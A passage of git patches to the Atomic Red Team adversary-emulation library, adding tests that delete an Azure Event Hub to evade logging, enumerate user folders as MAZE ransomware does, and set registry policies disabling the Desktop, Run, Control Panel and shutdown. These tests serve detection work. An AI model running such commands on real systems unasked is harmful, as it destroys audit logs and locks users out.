 defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
 defense-evasion,T1562.008,Disable Cloud Logs,1,AWS CloudTrail Changes,9c10dc6b-20bd-403a-8e67-50ef7d07ed4e,sh
+defense-evasion,T1562.008,Disable Cloud Logs,2,Azure - Eventhub Deletion,5e09bed0-7d33-453b-9bf3-caea32bff719,powershell
 defense-evasion,T1562.004,Disable or Modify System Firewall,7,Stop/Start UFW firewall,fe135572-edcd-49a2-afe6-1d39521c5a9a,sh
 defense-evasion,T1562.004,Disable or Modify System Firewall,8,Stop/Start UFW firewall systemctl,9fd99609-1854-4f3c-b47b-97d9a5972bd1,sh
 defense-evasion,T1562.004,Disable or Modify System Firewall,9,Turn off UFW logging,8a95b832-2c2a-494d-9cb0-dc9dd97c8bad,sh
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index b2590017..26247eb7 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -578,6 +578,7 @@
   - Atomic Test #1: Read volume boot sector via DOS device path (PowerShell) [windows]
 - [T1562.008 Disable Cloud Logs](../../T1562.008/T1562.008.md)
   - Atomic Test #1: AWS CloudTrail Changes [iaas:aws]
+  - Atomic Test #2: Azure - Eventhub Deletion [iaas:azure]
 - T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1562.002 Disable Windows Event Logging](../../T1562.002/T1562.002.md)
   - Atomic Test #1: Disable Windows IIS HTTP Logging [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index a467540a..133abe9d 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -216,6 +216,7 @@
 - T1610 Deploy Container [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1562.008 Disable Cloud Logs](../../T1562.008/T1562.008.md)
   - Atomic Test #1: AWS CloudTrail Changes [iaas:aws]
+  - Atomic Test #2: Azure - Eventhub Deletion [iaas:azure]
 - T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 8ec9b797..02f976bc 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -25131,6 +25131,57 @@ defense-evasion:
         cleanup_command: "aws s3 rb s3://#{s3_bucket_name} --force \n"
         name: sh
         elevation_required: false
+    - name: Azure - Eventhub Deletion
+      auto_generated_guid: 5e09bed0-7d33-453b-9bf3-caea32bff719
+      description: |
+        Identifies an Event Hub deletion in Azure.
+        An Event Hub is an event processing service that ingests and processes large volumes of events and data.
+        An adversary may delete an Event Hub in an attempt to evade detection.
+        https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about.
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure username
+          type: String
+          default: 
+        password:
+          description: Azure password
+          type: String
+          default: 
+        event_hub_name:
+          description: Name of the eventhub
+          type: String
+          default: test_eventhub
+        resource_group:
+          description: Name of the resource group
+          type: String
+          default: 
+        name_space_name:
+          description: Name of the NameSpace
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Install-Module -Name Az
+
+'
+        prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+'
+        get_prereq_command: 'Install-Module -Name AzureAD -Force
+
+'
+      executor:
+        command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-AzureAD -Credential $creds
+          New-AzEventHub -ResourceGroupName #{resource_group} -NamespaceName #{name_space_name} -Name #{event_hub_name}
+          Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name #{event_hub_name}
+        name: powershell
+        elevation_required: false
   T1600.002:
     technique:
       id: attack-pattern--7efba77e-3bc4-4ca5-8292-d8201dcd64b5
diff --git a/atomics/T1562.008/T1562.008.md b/atomics/T1562.008/T1562.008.md
index 1ab059ae..57fbeb8c 100644
--- a/atomics/T1562.008/T1562.008.md
+++ b/atomics/T1562.008/T1562.008.md
@@ -8,6 +8,8 @@ Cloud environments allow for collection and analysis of audit and application lo
 
 - [Atomic Test #1 - AWS CloudTrail Changes](#atomic-test-1---aws-cloudtrail-changes)
 
+- [Atomic Test #2 - Azure - Eventhub Deletion](#atomic-test-2---azure---eventhub-deletion)
+
 
 <br/>
 
@@ -64,4 +66,60 @@ echo Please install the aws-cli and configure your AWS defult profile using: aws
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Azure - Eventhub Deletion
+Identifies an Event Hub deletion in Azure.
+An Event Hub is an event processing service that ingests and processes large volumes of events and data.
+An adversary may delete an Event Hub in an attempt to evade detection.
+https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about.
+
+**Supported Platforms:** Iaas:azure
+
+
+**auto_generated_guid:** 5e09bed0-7d33-453b-9bf3-caea32bff719
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Azure username | String | |
+| password | Azure password | String | |
+| event_hub_name | Name of the eventhub | String | test_eventhub|
+| resource_group | Name of the resource group | String | |
+| name_space_name | Name of the NameSpace | String | |
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+Connect-AzureAD -Credential $creds
+New-AzEventHub -ResourceGroupName #{resource_group} -NamespaceName #{name_space_name} -Name #{event_hub_name}
+Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name #{event_hub_name}
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Install-Module -Name Az
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AzureAD -Force
+```
+
+
+
+
 <br/>

From ba8f007cea0891216e96c48ad72977f7b8993a86 Mon Sep 17 00:00:00 2001
From: Leo Verlod <96517806+Leomon5@users.noreply.github.com>
Date: Tue, 15 Mar 2022 19:32:03 -0500
Subject: [PATCH 50/83] Adding T1083 Test 5 - Simulating MAZE Directory
 Enumeration (#1812)

Adding T1083 Test 5 - Simulating MAZE Directory Enumeration. This test is designed to simulate the directory enumeration function used by MAZE ransomware (Windows).
---
 atomics/T1083/T1083.yaml | 28 ++++++++++++++++++++++++++++
 1 file changed, 28 insertions(+)

diff --git a/atomics/T1083/T1083.yaml b/atomics/T1083/T1083.yaml
index ad00894a..988e5da3 100644
--- a/atomics/T1083/T1083.yaml
+++ b/atomics/T1083/T1083.yaml
@@ -82,3 +82,31 @@ atomic_tests:
       find . -type f -name ".*"
     cleanup_command: 'rm #{output_file}'
     name: sh
+- name: Simulating MAZE Directory Enumeration
+  description: |
+    This test emulates MAZE ransomware's ability to enumerate directories using Powershell. 
+    Upon successful execution, this test will output the directory enumeration results to a specified file, as well as display them in the active window. 
+    See https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents
+  supported_platforms:
+  - windows
+  input_arguments:
+    File_to_output:
+      description: File to output results to
+      type: String
+      default: $env:temp\T1083Test5.txt
+  executor:
+    command: |
+      $folderarray = @("Desktop", "Downloads", "Documents", "AppData/Local", "AppData/Roaming")
+      Get-ChildItem -Path $env:homedrive -ErrorAction SilentlyContinue | Out-File -append #{File_to_output}
+      Get-ChildItem -Path $env:programfiles -erroraction silentlycontinue | Out-File -append #{File_to_output}
+      Get-ChildItem -Path "${env:ProgramFiles(x86)}" -erroraction silentlycontinue | Out-File -append #{File_to_output}
+      $UsersFolder = "$env:homedrive\Users\"
+      foreach ($directory in Get-ChildItem -Path $UsersFolder -ErrorAction SilentlyContinue) 
+      {
+      foreach ($secondarydirectory in $folderarray)
+       {Get-ChildItem -Path "$UsersFolder/$directory/$secondarydirectory" -ErrorAction SilentlyContinue | Out-File -append #{File_to_output}}
+      }
+      cat #{File_to_output}
+    cleanup_command: |
+      remove-item #{File_to_output} -ErrorAction SilentlyContinue
+    name: powershell  

From 6ac1e3a1a4a4ebe586d5c15c55aa1a795822aac7 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Wed, 16 Mar 2022 00:32:40 +0000
Subject: [PATCH 51/83] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/T1083/T1083.yaml | 1 +
 atomics/used_guids.txt   | 1 +
 2 files changed, 2 insertions(+)

diff --git a/atomics/T1083/T1083.yaml b/atomics/T1083/T1083.yaml
index 988e5da3..beef4ed5 100644
--- a/atomics/T1083/T1083.yaml
+++ b/atomics/T1083/T1083.yaml
@@ -83,6 +83,7 @@ atomic_tests:
     cleanup_command: 'rm #{output_file}'
     name: sh
 - name: Simulating MAZE Directory Enumeration
+  auto_generated_guid: c6c34f61-1c3e-40fb-8a58-d017d88286d8
   description: |
     This test emulates MAZE ransomware's ability to enumerate directories using Powershell. 
     Upon successful execution, this test will output the directory enumeration results to a specified file, as well as display them in the active window. 
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index de1e03e6..88d6f1b4 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -912,3 +912,4 @@ d4a6da40-618f-454d-9a9e-26af552aaeb0
 b51239b4-0129-474f-a2b4-70f855b9f2c2
 640cbf6d-659b-498b-ba53-f6dd1a1cc02c
 5e09bed0-7d33-453b-9bf3-caea32bff719
+c6c34f61-1c3e-40fb-8a58-d017d88286d8

From 341b5b198766888e108e68c0940066281fe16728 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Wed, 16 Mar 2022 00:32:47 +0000
Subject: [PATCH 52/83] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  1 +
 atomics/Indexes/Indexes-Markdown/index.md     |  1 +
 .../Indexes/Indexes-Markdown/windows-index.md |  1 +
 atomics/Indexes/index.yaml                    | 28 ++++++++++
 atomics/T1083/T1083.md                        | 51 +++++++++++++++++++
 6 files changed, 83 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 9469cf77..440e572d 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -821,6 +821,7 @@ discovery,T1083,File and Directory Discovery,1,File and Directory Discovery (cmd
 discovery,T1083,File and Directory Discovery,2,File and Directory Discovery (PowerShell),2158908e-b7ef-4c21-8a83-3ce4dd05a924,powershell
 discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
 discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
+discovery,T1083,File and Directory Discovery,5,Simulating MAZE Directory Enumeration,c6c34f61-1c3e-40fb-8a58-d017d88286d8,powershell
 discovery,T1087.001,Local Account,1,Enumerate all accounts (Local),f8aab3dd-5990-4bf8-b8ab-2226c951696f,sh
 discovery,T1087.001,Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
 discovery,T1087.001,Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 0f3cc867..7415432b 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -561,6 +561,7 @@ discovery,T1482,Domain Trust Discovery,6,Get-DomainTrust with PowerView,f974894c
 discovery,T1482,Domain Trust Discovery,7,Get-ForestTrust with PowerView,58ed10e8-0738-4651-8408-3a3e9a526279,powershell
 discovery,T1083,File and Directory Discovery,1,File and Directory Discovery (cmd.exe),0e36303b-6762-4500-b003-127743b80ba6,command_prompt
 discovery,T1083,File and Directory Discovery,2,File and Directory Discovery (PowerShell),2158908e-b7ef-4c21-8a83-3ce4dd05a924,powershell
+discovery,T1083,File and Directory Discovery,5,Simulating MAZE Directory Enumeration,c6c34f61-1c3e-40fb-8a58-d017d88286d8,powershell
 discovery,T1087.001,Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
 discovery,T1087.001,Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
 discovery,T1087.001,Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 26247eb7..85d3ea02 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1326,6 +1326,7 @@
   - Atomic Test #2: File and Directory Discovery (PowerShell) [windows]
   - Atomic Test #3: Nix File and Directory Discovery [macos, linux]
   - Atomic Test #4: Nix File and Directory Discovery 2 [macos, linux]
+  - Atomic Test #5: Simulating MAZE Directory Enumeration [windows]
 - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1087.001 Local Account](../../T1087.001/T1087.001.md)
   - Atomic Test #1: Enumerate all accounts (Local) [linux]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index e82acf47..e93541ee 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -947,6 +947,7 @@
 - [T1083 File and Directory Discovery](../../T1083/T1083.md)
   - Atomic Test #1: File and Directory Discovery (cmd.exe) [windows]
   - Atomic Test #2: File and Directory Discovery (PowerShell) [windows]
+  - Atomic Test #5: Simulating MAZE Directory Enumeration [windows]
 - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1087.001 Local Account](../../T1087.001/T1087.001.md)
   - Atomic Test #8: Enumerate all accounts on Windows (Local) [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 02f976bc..f3b8af6a 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -56087,6 +56087,34 @@ discovery:
           find . -type f -name ".*"
         cleanup_command: 'rm #{output_file}'
         name: sh
+    - name: Simulating MAZE Directory Enumeration
+      auto_generated_guid: c6c34f61-1c3e-40fb-8a58-d017d88286d8
+      description: "This test emulates MAZE ransomware's ability to enumerate directories
+        using Powershell. \nUpon successful execution, this test will output the directory
+        enumeration results to a specified file, as well as display them in the active
+        window. \nSee https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        File_to_output:
+          description: File to output results to
+          type: String
+          default: "$env:temp\\T1083Test5.txt"
+      executor:
+        command: "$folderarray = @(\"Desktop\", \"Downloads\", \"Documents\", \"AppData/Local\",
+          \"AppData/Roaming\")\nGet-ChildItem -Path $env:homedrive -ErrorAction SilentlyContinue
+          | Out-File -append #{File_to_output}\nGet-ChildItem -Path $env:programfiles
+          -erroraction silentlycontinue | Out-File -append #{File_to_output}\nGet-ChildItem
+          -Path \"${env:ProgramFiles(x86)}\" -erroraction silentlycontinue | Out-File
+          -append #{File_to_output}\n$UsersFolder = \"$env:homedrive\\Users\\\"\nforeach
+          ($directory in Get-ChildItem -Path $UsersFolder -ErrorAction SilentlyContinue)
+          \n{\nforeach ($secondarydirectory in $folderarray)\n {Get-ChildItem -Path
+          \"$UsersFolder/$directory/$secondarydirectory\" -ErrorAction SilentlyContinue
+          | Out-File -append #{File_to_output}}\n}\ncat #{File_to_output}\n"
+        cleanup_command: 'remove-item #{File_to_output} -ErrorAction SilentlyContinue
+
+'
+        name: powershell
   T1016.001:
     technique:
       external_references:
diff --git a/atomics/T1083/T1083.md b/atomics/T1083/T1083.md
index 90ef8a50..b040b8d9 100644
--- a/atomics/T1083/T1083.md
+++ b/atomics/T1083/T1083.md
@@ -14,6 +14,8 @@ Many command shell utilities can be used to obtain this information. Examples in
 
 - [Atomic Test #4 - Nix File and Directory Discovery 2](#atomic-test-4---nix-file-and-directory-discovery-2)
 
+- [Atomic Test #5 - Simulating MAZE Directory Enumeration](#atomic-test-5---simulating-maze-directory-enumeration)
+
 
 <br/>
 
@@ -170,4 +172,53 @@ rm #{output_file}
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #5 - Simulating MAZE Directory Enumeration
+This test emulates MAZE ransomware's ability to enumerate directories using Powershell. 
+Upon successful execution, this test will output the directory enumeration results to a specified file, as well as display them in the active window. 
+See https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** c6c34f61-1c3e-40fb-8a58-d017d88286d8
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| File_to_output | File to output results to | String | $env:temp&#92;T1083Test5.txt|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$folderarray = @("Desktop", "Downloads", "Documents", "AppData/Local", "AppData/Roaming")
+Get-ChildItem -Path $env:homedrive -ErrorAction SilentlyContinue | Out-File -append #{File_to_output}
+Get-ChildItem -Path $env:programfiles -erroraction silentlycontinue | Out-File -append #{File_to_output}
+Get-ChildItem -Path "${env:ProgramFiles(x86)}" -erroraction silentlycontinue | Out-File -append #{File_to_output}
+$UsersFolder = "$env:homedrive\Users\"
+foreach ($directory in Get-ChildItem -Path $UsersFolder -ErrorAction SilentlyContinue) 
+{
+foreach ($secondarydirectory in $folderarray)
+ {Get-ChildItem -Path "$UsersFolder/$directory/$secondarydirectory" -ErrorAction SilentlyContinue | Out-File -append #{File_to_output}}
+}
+cat #{File_to_output}
+```
+
+#### Cleanup Commands:
+```powershell
+remove-item #{File_to_output} -ErrorAction SilentlyContinue
+```
+
+
+
+
+
 <br/>

From 1cb8a5395b6653da31dcea559601ca3076532c7c Mon Sep 17 00:00:00 2001
From: tccontre <26181693+tccontre@users.noreply.github.com>
Date: Wed, 16 Mar 2022 01:44:39 +0100
Subject: [PATCH 53/83] Disable Windows Notification And Some Group Policy
 Features. (#1813)

* Update T1112.yaml

* Update T1112.yaml

* typos

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1112/T1112.yaml | 228 +++++++++++++++++++++++++++++++++++++--
 1 file changed, 219 insertions(+), 9 deletions(-)

diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml
index 997b2a40..1e74ca0f 100644
--- a/atomics/T1112/T1112.yaml
+++ b/atomics/T1112/T1112.yaml
@@ -160,7 +160,7 @@ atomic_tests:
   auto_generated_guid: ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8
   description: |
     Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows registry tool to prevent user modifying registry entry.
-    See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+    See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
   supported_platforms:
   - windows
   executor:
@@ -174,7 +174,7 @@ atomic_tests:
   auto_generated_guid: d2561a6d-72bd-408c-b150-13efe1801c2a
   description: |
     Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows CMD application.
-    See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+    See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
   supported_platforms:
   - windows
   executor:
@@ -188,7 +188,7 @@ atomic_tests:
   auto_generated_guid: af254e70-dd0e-4de6-9afe-a994d9ea8b62
   description: |
     Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows task manager application.
-    See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
+    See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry
   supported_platforms:
   - windows
   executor:
@@ -202,7 +202,7 @@ atomic_tests:
   auto_generated_guid: c0d6d67f-1f63-42cc-95c0-5fd6b20082ad
   description: |
     Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows notification center.
-    See how remcos rat abuse this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html
+    See how remcos rat abuses this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html
   supported_platforms:
   - windows
   executor:
@@ -216,7 +216,7 @@ atomic_tests:
   auto_generated_guid: 6e0d1131-2d7e-4905-8ca5-d6172f05d03d
   description: |
     Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button.
-    See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/
+    See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/
   supported_platforms:
   - windows
   executor:
@@ -230,7 +230,7 @@ atomic_tests:
   auto_generated_guid: e246578a-c24d-46a7-9237-0213ff86fb0c
   description: |
     Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button.
-    See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2
+    See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/be/threat-encyclopedia/search/js_noclose.e/2
   supported_platforms:
   - windows
   executor:
@@ -246,7 +246,7 @@ atomic_tests:
   auto_generated_guid: d4a6da40-618f-454d-9a9e-26af552aaeb0
   description: |
     Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows change password feature.
-    See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah
+    See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom_heartbleed.thdobah
   supported_platforms:
   - windows
   executor:
@@ -260,7 +260,7 @@ atomic_tests:
   auto_generated_guid: 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56
   description: |
     Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows Lock workstation feature.
-    See how ransomware abuse this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/
+    See how ransomware abuses this technique- https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/
   supported_platforms:
   - windows
   executor:
@@ -269,4 +269,214 @@ atomic_tests:
     cleanup_command: |
       reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /f >nul 2>&1
     name: command_prompt
-    elevation_required: true
\ No newline at end of file
+    elevation_required: true
+- name: Activate Windows NoDesktop Group Policy Feature
+  auto_generated_guid: 93386d41-525c-4a1b-8235-134a628dee17
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to hide all icons on Desktop Group Policy. 
+    Take note that some Group Policy changes might require a restart to take effect.
+    See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDesktop /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDesktop /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Activate Windows NoRun Group Policy Feature
+  auto_generated_guid: d49ff3cc-8168-4123-b5b3-f057d9abbd55
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Run menu from Start Menu Group Policy.
+    Take note that some Group Policy changes might require a restart to take effect.
+    See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /f 
+    name: command_prompt
+    elevation_required: true
+- name: Activate Windows NoFind Group Policy Feature
+  auto_generated_guid: ffbb407e-7f1d-4c95-b22e-548169db1fbd
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to Remove Search menu from Start Menu Group Policy.
+    Take note that some Group Policy changes might require a restart to take effect.
+    See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Activate Windows NoControlPanel Group Policy Feature
+  auto_generated_guid: a450e469-ba54-4de1-9deb-9023a6111690
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to Disable Control Panel Group Policy. 
+    Take note that some Group Policy changes might require a restart to take effect.
+    See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: Activate Windows NoFileMenu Group Policy Feature
+  auto_generated_guid: 5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to Remove File menu from Windows Explorer Group Policy. 
+    Take note that some Group Policy changes might require a restart to take effect.
+    See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true  
+- name: Activate Windows NoClose Group Policy Feature
+  auto_generated_guid: 12f50e15-dbc6-478b-a801-a746e8ba1723
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to Disable and remove the Shut Down command Group Policy. 
+    Take note that some Group Policy changes might require a restart to take effect.
+    See how Trojan abuses this technique- https://www.sophos.com/de-de/threat-center/threat-analyses/viruses-and-spyware/Troj~Krotten-N/detailed-analysis
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
+    cleanup_command: |
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true 
+- name: Activate Windows NoSetTaskbar Group Policy Feature
